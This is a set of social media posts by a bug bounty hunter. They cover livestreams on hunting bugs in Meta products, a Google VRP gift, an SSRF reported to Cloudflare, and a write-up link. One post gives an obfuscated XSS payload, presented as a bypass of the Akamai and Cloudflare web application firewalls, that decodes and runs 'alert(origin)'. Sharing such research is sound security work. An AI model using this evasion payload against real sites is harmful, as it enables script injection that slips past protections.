قراره تو یه ایونت، تجربههامون از هانت کردن روی متا(فیسبوک، اینستاگرام،...) و تکنولوژیهایی که متا استفاده میکنه ابزار های که توسعه داده شده رو باهاتون به اشتراک بذاریم! زمان لایو برا هفته آینده اس تایم دقیق هم خود چنل میذاریم.
📺 سه تا لایو داریم که با @p__oria ❤️ بهصورت مشترک برگزار میشه.
اگه دوست دارین تو لایوها شرکت کنین، فقط کافیه جوین سرور دیسکورد بدین
link:
https://t.co/n8Fr1S6f39
Today I received the gift sent by Google VRP. Thank you so much for the beautiful hoodies you sent me.
@GoogleVRP & @Google ❤️❤️
@AtaTurk1925 ❤️😘❤️😘❤️
#BugBounty
Back in the game after a long break 🎯
Even without finding a bug, discovering a hidden and undocumented endpoint feels rewarding.
You don’t always need an exploit — sometimes the hunt itself is the real win.
@p__oria 😘😘😘
SSRF → Internal IP Leak ( 80% it could be it )
Yesterday, after reporting an SSRF vulnerability to Cloudflare, I decided to revisit it to see if I could chain it into something more impactful. Nothing worked, until I started digging into the HTTP callback behavior.
I just found a WAF bypass for Akamai and Cloudflare:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
I’ve just shared a new write-up!
A small curiosity turned into a full-blown SSRF — internal access, exposed data, and deep exploration.
Read it here:
https://t.co/MXJGiipWnr
#BugBounty